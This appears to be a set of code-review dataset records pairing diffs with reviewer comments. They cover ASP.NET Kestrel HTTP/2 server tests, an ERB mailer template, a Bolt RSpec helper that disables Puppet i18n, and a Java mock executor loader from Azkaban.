context.Response.ContentLength = 11;
await context.Response.WriteAsync("hello, world"); // 12
});
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
Assert.Contains(TestApplicationErrorLogger.Messages, m => m.Exception?.Message.Contains("Response Content-Length mismatch: too many bytes written (12 of 11).") ?? false);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("500", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ContentLength_Response_MoreBytesWritten_ThrowsAndResetsStream()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(async context =>
{
context.Response.ContentLength = 11;
await context.Response.WriteAsync("hello,");
await context.Response.WriteAsync(" world");
});
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 56,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 6,
withFlags: (byte)Http2DataFrameFlags.NONE,
withStreamId: 1);
await WaitForStreamErrorAsync(1, Http2ErrorCode.INTERNAL_ERROR, "Response Content-Length mismatch: too many bytes written (12 of 11).");
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("11", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ContentLength_Response_NoBytesWritten_Sends500()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(context =>
{
context.Response.ContentLength = 11;
return Task.CompletedTask;
});
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
Assert.Contains(TestApplicationErrorLogger.Messages, m => m.Exception?.Message.Contains("Response Content-Length mismatch: too few bytes written (0 of 11).") ?? false);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("500", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ContentLength_Response_TooFewBytesWritten_Resets()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(context =>
{
context.Response.ContentLength = 11;
return context.Response.WriteAsync("hello,");
});
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 56,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 6,
withFlags: (byte)Http2DataFrameFlags.NONE,
withStreamId: 1);
await WaitForStreamErrorAsync(1, Http2ErrorCode.INTERNAL_ERROR, "Response Content-Length mismatch: too few bytes written (6 of 11).");
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("11", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task MaxRequestBodySize_ContentLengthUnder_200()
{
_connectionContext.ServiceContext.ServerOptions.Limits.MaxRequestBodySize = 15;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
var buffer = new byte[100];
var read = await context.Request.Body.ReadAsync(buffer, 0, buffer.Length);
Assert.Equal(12, read);
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[12].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task MaxRequestBodySize_ContentLengthOver_413()
{
BadHttpRequestException exception = null;
_connectionContext.ServiceContext.ServerOptions.Limits.MaxRequestBodySize = 10;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
};
await InitializeConnectionAsync(async context =>
{
exception = await Assert.ThrowsAsync<BadHttpRequestException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
ExceptionDispatchInfo.Capture(exception).Throw();
});
await StartStreamAsync(1, headers, endStream: false);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 59,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("413", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
Assert.NotNull(exception);
}
[Fact]
public async Task MaxRequestBodySize_NoContentLength_Under_200()
{
_connectionContext.ServiceContext.ServerOptions.Limits.MaxRequestBodySize = 15;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(async context =>
{
var buffer = new byte[100];
var read = await context.Request.Body.ReadAsync(buffer, 0, buffer.Length);
Assert.Equal(12, read);
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[12].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task MaxRequestBodySize_NoContentLength_Over_413()
{
BadHttpRequestException exception = null;
_connectionContext.ServiceContext.ServerOptions.Limits.MaxRequestBodySize = 10;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(async context =>
{
exception = await Assert.ThrowsAsync<BadHttpRequestException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
ExceptionDispatchInfo.Capture(exception).Throw();
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[6].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[6].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[6].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 59,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("413", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
Assert.NotNull(exception);
}
[Theory]
[InlineData(true)]
[InlineData(false)]
public async Task MaxRequestBodySize_AppCanLowerLimit(bool includeContentLength)
{
BadHttpRequestException exception = null;
_connectionContext.ServiceContext.ServerOptions.Limits.MaxRequestBodySize = 20;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
if (includeContentLength)
{
                headers = headers.Concat(new[]
                {
                    new KeyValuePair<string, string>(HeaderNames.ContentLength, "18"),
                }).ToArray();
}
await InitializeConnectionAsync(async context =>
{
Assert.False(context.Features.Get<IHttpMaxRequestBodySizeFeature>().IsReadOnly);
context.Features.Get<IHttpMaxRequestBodySizeFeature>().MaxRequestBodySize = 17;
exception = await Assert.ThrowsAsync<BadHttpRequestException>(async () =>
{
var buffer = new byte[100];
while (await context.Request.Body.ReadAsync(buffer, 0, buffer.Length) > 0) { }
});
Assert.True(context.Features.Get<IHttpMaxRequestBodySizeFeature>().IsReadOnly);
ExceptionDispatchInfo.Capture(exception).Throw();
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[6].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[6].AsSpan(), endStream: false);
await SendDataAsync(1, new byte[6].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 59,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("413", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
Assert.NotNull(exception);
}
[Theory]
[InlineData(true)]
[InlineData(false)]
public async Task MaxRequestBodySize_AppCanRaiseLimit(bool includeContentLength)
{
_connectionContext.ServiceContext.ServerOptions.Limits.MaxRequestBodySize = 10;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
if (includeContentLength)
{
                headers = headers.Concat(new[]
                {
                    new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
                }).ToArray();
}
await InitializeConnectionAsync(async context =>
{
Assert.False(context.Features.Get<IHttpMaxRequestBodySizeFeature>().IsReadOnly);
context.Features.Get<IHttpMaxRequestBodySizeFeature>().MaxRequestBodySize = 12;
var buffer = new byte[100];
var read = await context.Request.Body.ReadAsync(buffer, 0, buffer.Length);
Assert.Equal(12, read);
Assert.True(context.Features.Get<IHttpMaxRequestBodySizeFeature>().IsReadOnly);
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[12].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
        public async Task ApplicationException_BeforeFirstWrite_Sends500()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(context =>
{
throw new Exception("App Faulted");
});
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
Assert.Contains(TestApplicationErrorLogger.Messages, m => (m.Exception?.Message.Contains("App Faulted") ?? false) && m.LogLevel == LogLevel.Error);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("500", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
        public async Task ApplicationException_AfterFirstWrite_Resets()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(async context =>
{
await context.Response.WriteAsync("hello,");
throw new Exception("App Faulted");
});
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 37,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 6,
withFlags: (byte)Http2DataFrameFlags.NONE,
withStreamId: 1);
await WaitForStreamErrorAsync(1, Http2ErrorCode.INTERNAL_ERROR, "App Faulted");
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(2, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
}
[Fact]
public async Task RST_STREAM_Received_AbortsStream()
{
await InitializeConnectionAsync(_waitForAbortApplication);
await StartStreamAsync(1, _browserRequestHeaders, endStream: true);
await SendRstStreamAsync(1);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RST_STREAM_Received_AbortsStream_FlushedHeadersNotSent()
{
await InitializeConnectionAsync(_waitForAbortFlushingApplication);
await StartStreamAsync(1, _browserRequestHeaders, endStream: true);
await SendRstStreamAsync(1);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RST_STREAM_Received_AbortsStream_FlushedDataNotSent()
{
await InitializeConnectionAsync(_waitForAbortWithDataApplication);
await StartStreamAsync(1, _browserRequestHeaders, endStream: true);
await SendRstStreamAsync(1);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RST_STREAM_WaitingForRequestBody_RequestBodyThrows()
{
var sem = new SemaphoreSlim(0);
await InitializeConnectionAsync(async context =>
{
var streamIdFeature = context.Features.Get<IHttp2StreamIdFeature>();
try
{
var readTask = context.Request.Body.ReadAsync(new byte[100], 0, 100).DefaultTimeout();
sem.Release();
await readTask;
_runningStreams[streamIdFeature.StreamId].TrySetException(new Exception("ReadAsync was expected to throw."));
}
catch (IOException) // Expected failure
{
await context.Response.Body.WriteAsync(new byte[10], 0, 10);
lock (_abortedStreamIdsLock)
{
_abortedStreamIds.Add(streamIdFeature.StreamId);
}
_runningStreams[streamIdFeature.StreamId].TrySetResult(null);
}
catch (Exception ex)
{
_runningStreams[streamIdFeature.StreamId].TrySetException(ex);
}
});
await StartStreamAsync(1, _browserRequestHeaders, endStream: false);
await sem.WaitAsync().DefaultTimeout();
await SendRstStreamAsync(1);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RST_STREAM_IncompleteRequest_RequestBodyThrows()
{
var sem = new SemaphoreSlim(0);
await InitializeConnectionAsync(async context =>
{
var streamIdFeature = context.Features.Get<IHttp2StreamIdFeature>();
try
{
var read = await context.Request.Body.ReadAsync(new byte[100], 0, 100).DefaultTimeout();
var readTask = context.Request.Body.ReadAsync(new byte[100], 0, 100).DefaultTimeout();
sem.Release();
await readTask;
_runningStreams[streamIdFeature.StreamId].TrySetException(new Exception("ReadAsync was expected to throw."));
}
catch (IOException) // Expected failure
{
await context.Response.Body.WriteAsync(new byte[10], 0, 10);
lock (_abortedStreamIdsLock)
{
_abortedStreamIds.Add(streamIdFeature.StreamId);
}
_runningStreams[streamIdFeature.StreamId].TrySetResult(null);
}
catch (Exception ex)
{
_runningStreams[streamIdFeature.StreamId].TrySetException(ex);
}
});
await StartStreamAsync(1, _browserRequestHeaders, endStream: false);
await SendDataAsync(1, new byte[10], endStream: false);
await sem.WaitAsync().DefaultTimeout();
await SendRstStreamAsync(1);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RequestAbort_SendsRstStream()
{
await InitializeConnectionAsync(async context =>
{
var streamIdFeature = context.Features.Get<IHttp2StreamIdFeature>();
try
{
context.RequestAborted.Register(() =>
{
lock (_abortedStreamIdsLock)
{
_abortedStreamIds.Add(streamIdFeature.StreamId);
}
_runningStreams[streamIdFeature.StreamId].TrySetResult(null);
});
context.Abort();
// Not sent
await context.Response.Body.WriteAsync(new byte[10], 0, 10);
await _runningStreams[streamIdFeature.StreamId].Task;
}
catch (Exception ex)
{
_runningStreams[streamIdFeature.StreamId].TrySetException(ex);
}
});
await StartStreamAsync(1, _browserRequestHeaders, endStream: true);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.INTERNAL_ERROR, CoreStrings.ConnectionAbortedByApplication);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RequestAbort_AfterDataSent_SendsRstStream()
{
await InitializeConnectionAsync(async context =>
{
var streamIdFeature = context.Features.Get<IHttp2StreamIdFeature>();
try
{
context.RequestAborted.Register(() =>
{
lock (_abortedStreamIdsLock)
{
_abortedStreamIds.Add(streamIdFeature.StreamId);
}
_runningStreams[streamIdFeature.StreamId].TrySetResult(null);
});
await context.Response.Body.WriteAsync(new byte[10], 0, 10);
context.Abort();
// Not sent
await context.Response.Body.WriteAsync(new byte[11], 0, 11);
await _runningStreams[streamIdFeature.StreamId].Task;
}
catch (Exception ex)
{
_runningStreams[streamIdFeature.StreamId].TrySetException(ex);
}
});
await StartStreamAsync(1, _browserRequestHeaders, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 37,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 10,
withFlags: 0,
withStreamId: 1);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.INTERNAL_ERROR, CoreStrings.ConnectionAbortedByApplication);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RequestAbort_ThrowsOperationCanceledExceptionFromSubsequentRequestBodyStreamRead()
{
OperationCanceledException thrownEx = null;
await InitializeConnectionAsync(async context =>
{
context.Abort();
var buffer = new byte[100];
var thrownExTask = Assert.ThrowsAnyAsync<OperationCanceledException>(() => context.Request.Body.ReadAsync(buffer, 0, buffer.Length));
Assert.True(thrownExTask.IsCompleted);
thrownEx = await thrownExTask;
});
await StartStreamAsync(1, _browserRequestHeaders, endStream: false);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.INTERNAL_ERROR, CoreStrings.ConnectionAbortedByApplication);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
Assert.NotNull(thrownEx);
Assert.IsType<ConnectionAbortedException>(thrownEx);
Assert.Equal(CoreStrings.ConnectionAbortedByApplication, thrownEx.Message);
}
[Fact]
public async Task RequestAbort_ThrowsOperationCanceledExceptionFromOngoingRequestBodyStreamRead()
{
OperationCanceledException thrownEx = null;
await InitializeConnectionAsync(async context =>
{
var buffer = new byte[100];
var thrownExTask = Assert.ThrowsAnyAsync<OperationCanceledException>(() => context.Request.Body.ReadAsync(buffer, 0, buffer.Length));
Assert.False(thrownExTask.IsCompleted);
context.Abort();
thrownEx = await thrownExTask.DefaultTimeout();
});
await StartStreamAsync(1, _browserRequestHeaders, endStream: false);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.INTERNAL_ERROR, CoreStrings.ConnectionAbortedByApplication);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
Assert.NotNull(thrownEx);
Assert.IsType<TaskCanceledException>(thrownEx);
Assert.Equal("The request was aborted", thrownEx.Message);
Assert.IsType<ConnectionAbortedException>(thrownEx.InnerException);
Assert.Equal(CoreStrings.ConnectionAbortedByApplication, thrownEx.InnerException.Message);
}
}
} | 1 | 16,364 | Stephen already fixed this one. Only the OverSize test is flaky now right? | aspnet-KestrelHttpServer | .cs |
@@ -0,0 +1,6 @@
+<%= @activity %>
+
+<%= t("mailer.proposal_link_text",
+ proposal_url: proposal_url(@proposal)) %>
+
+<%= t("mailer.footer", feedback_url: feedback_url) %> | 1 | 1 | 16,664 | if the `activity_mailer` has a layout, should we include the footer in that? Realize there may also be conflicts with work @rememberlenny is working on... | 18F-C2 | rb |
|
@@ -16,6 +16,12 @@ require 'ruby_smb'
ENV['RACK_ENV'] = 'test'
$LOAD_PATH.unshift File.join(__dir__, 'lib')
+# Disables internationalized strings, which shouldn't be needed for tests.
+# This gets around an issue where Puppet::Environment and GettextSetup in
+# r10k are fighting over the same text domain within the FastGettext domain.
+# https://github.com/voxpupuli/ra10ke/issues/39
+Puppet[:disable_i18n] = true
+
RSpec.shared_context 'reset puppet settings' do
after :each do
# reset puppet settings so that they can be initialized again | 1 | # frozen_string_literal: true
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
require 'bolt'
require 'bolt/logger'
require 'logging'
require 'net/ssh'
require 'rspec/logging_helper'
# Make sure puppet is required for the 'reset puppet settings' context
require 'puppet_pal'
# HACK: must be loaded prior to spec libs that implement stub to prevent
# RubySMB::Dcerpc::Request from shadowing 'stub' through BinData::DSLMixin::DSLFieldValidator
require 'ruby_smb'
ENV['RACK_ENV'] = 'test'
$LOAD_PATH.unshift File.join(__dir__, 'lib')
RSpec.shared_context 'reset puppet settings' do
after :each do
# reset puppet settings so that they can be initialized again
Puppet.settings.instance_exec do
clear_everything_for_tests
end
end
end
RSpec.configure do |config|
Bolt::Logger.initialize_logging
include RSpec::LoggingHelper
config.capture_log_messages
# rspec-expectations config
config.expect_with :rspec do |expectations|
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
expectations.max_formatted_output_length = 500
end
config.filter_run_excluding windows_agents: true unless ENV['WINDOWS_AGENTS']
config.filter_run_excluding windows: true unless ENV['BOLT_WINDOWS']
config.filter_run_excluding sudo: true unless ENV['BOLT_SUDO_USER']
# rspec-mocks config
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object.
mocks.verify_partial_doubles = true
end
config.before :each do
# Disable analytics while running tests
ENV['BOLT_DISABLE_ANALYTICS'] = 'true'
# Ignore local project.yaml files
allow(Bolt::Project).to receive(:new).and_call_original
allow(Bolt::Project).to receive(:new).with('.')
.and_return(Bolt::Project.new(Dir.mktmpdir))
# Ignore user's known hosts and ssh config files
conf = { user_known_hosts_file: '/dev/null/', global_known_hosts_file: '/dev/null' }
allow(Net::SSH::Config).to receive(:for).and_return(conf)
end
# This will be default in future rspec, leave it on
config.shared_context_metadata_behavior = :apply_to_host_groups
# Allows RSpec to persist some state between runs in order to support
# the `--only-failures` and `--next-failure` CLI options.
config.example_status_persistence_file_path = "spec/examples.txt"
# config.warnings = true
# Make it possible to include the 'reset puppet settings' shared context
# in a group (or even an individual test) by specifying
# `:reset_puppet_settings' metadata on the group/test
config.include_context 'reset puppet settings', :reset_puppet_settings
end
| 1 | 14,808 | This makes me nervous, mostly because I don't know very much about it. Will users run into the gettext error in the wild? I can't reproduce it locally, but it's hard to be 100% sure. Is disabling gettext in Pal an option? | puppetlabs-bolt | rb |
@@ -388,4 +388,10 @@ public class MockExecutorLoader implements ExecutorLoader {
public void unassignExecutor(int executionId) throws ExecutorManagerException {
executionExecutorMapping.remove(executionId);
}
+
+ @Override
+ public List<ExecutableFlow> fetchRecentlyFinishedFlows(long lifeTimeMs)
+ throws ExecutorManagerException {
+ return new ArrayList<>();
+ }
} | 1 | /*
* Copyright 2014 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package azkaban.executor;
import java.io.File;
import java.util.ArrayList;
import java.util.Date;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import azkaban.executor.ExecutorLogEvent.EventType;
import azkaban.utils.FileIOUtils.LogData;
import azkaban.utils.Pair;
import azkaban.utils.Props;
public class MockExecutorLoader implements ExecutorLoader {
HashMap<Integer, Integer> executionExecutorMapping =
new HashMap<Integer, Integer>();
HashMap<Integer, ExecutableFlow> flows =
new HashMap<Integer, ExecutableFlow>();
HashMap<String, ExecutableNode> nodes = new HashMap<String, ExecutableNode>();
HashMap<Integer, ExecutionReference> refs =
new HashMap<Integer, ExecutionReference>();
int flowUpdateCount = 0;
HashMap<String, Integer> jobUpdateCount = new HashMap<String, Integer>();
Map<Integer, Pair<ExecutionReference, ExecutableFlow>> activeFlows =
new HashMap<Integer, Pair<ExecutionReference, ExecutableFlow>>();
